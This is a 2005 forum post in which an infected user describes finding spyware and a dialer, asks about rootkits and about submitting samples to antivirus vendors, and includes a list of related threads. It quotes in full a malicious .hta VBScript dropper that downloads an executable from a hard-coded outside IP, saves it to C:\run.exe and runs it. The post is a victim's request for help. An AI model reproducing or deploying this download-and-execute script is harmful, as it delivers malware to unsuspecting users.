Re: Expert needed, TCP DUMP INSIDE, HELP!!!!!

From: derp (dero5150_at_yahoo.com)
Date: 03/13/05 

Date: 13 Mar 2005 11:05:49 -0800

Thank you for your response. Got some semi-good news.

Kind of had a hunch i had a virus when before connecting ot ameritrade
streamer i did a netstat-b right when my computer had started, a system
process (i forget which) had connected to hotmail mail server, had to
leave early so i didnt get a time to check. By the time i got home my
internet wasnt working and had a porn dialer running (good thing i dont
use dial up).

1) I did an exhastive serach for the IP (both string and hex search)
throughout the harddrive (70gigs of data), found 1 dll with the hex
value (i assume that was by chance since a couple mp3s came up to).
The string search of every file inside my computer came up with the
same spyware ("0CAT Yellow Pages") that i manually removed earlier
(seems like it some how installed itself again). It also found
"Dc46.hta" in a folder called "STLinks" in the Programs folder.

Dc46.hta answers alot of questions, here are the contents

"Sink started at 2005/03/08 11:05:39.0302
<script language=vbscript>:
on error resume next:
set o = CreateObject("msxml2.XMLHTTP"):
o.open
"GET","http://69.50.160.98/affiliates/exe.php?group=safestep3&id=acc0000",False:
o.send:
set s = createobject("adodb.stream"):
s.type=1:
s.open:
s.write o.responseBody:
s.savetofile "C:\run.exe",2:
Set ws = CreateObject("WScript.Shell"):
ws.Run "C:\run.exe", 3, FALSE:
</script>:
Sink stopped at 2005/03/08 11:05:39.0322"

(kind of obvious whats going on in the script)

2) BTW: I accidently opened Dc46.hta with Frontpage (after i removed
it and put into floppy for future analysis), would that have run the
script?

I have also removed run.exe and put it into a floppy.

3) Dont know what is setting off "run.exe" or "Dc46.hta", an exhastive
registry search yeiled nothing. How can i find out if the loading
method has been attached to a differnt non-malicous dll or exe?

4) Quick question: if i get a rootkit virus on my computer, is it
theoretically possible for my machine to be sending out packets without
Ethreal or anyother service based packet capturer being able to capture
the data?

5) Can i send these files to anybody so they can be added to future
virus definitions?

Oh and Thank you for telling be about process explorer and active
ports. Process explorer is just AMAZING.

Thanks again.

Relevant Pages

  • Re: Viruses and Linux
    ... There are a difference between *nix systems and microsoft windows, ... So the one who writes say an Evolution script, this scriptwriter, if he wants ... Next you need to get the virus to the next machine, ...
    (alt.os.linux)
  • Re: Help fails
    ... Basically something has killed my ability to run "Help and Support" ... I did find this after posting and ran the VB script. ... check even though I have not heard of a virus doing this but none ... I know one of the file cleaning programs can cause this and I ...
    (alt.os.windows-xp)
  • Re: HELP, Hacked with machine account
    ... First run a virus scan and trojan scan [SwatIt is a free download] program with ... including Autoruns, TCPView, and Process Explorer. ... > I was hacked by a person usering a machine$ account and nt authority. ...
    (microsoft.public.win2000.security)
  • Re: Virus infection as soon as Im online! Help
    ... with spy watching. ... delete the virus so I formated C: ... Did you turn on your firewall before connecting to the Internet? ...
    (microsoft.public.security)
  • Re: Rule Wizard and script to initiate e-mail
    ... If there are 9 or more e-mails having this property value exactly the same, then trigger the script to create an e-mail and attach all these 'same time' e-mails. ... Whenever an e-mail arrives from ePO server as virus alert with subject "Virus Detected and NOT removed - computername". ...
    (microsoft.public.outlook.program_vba)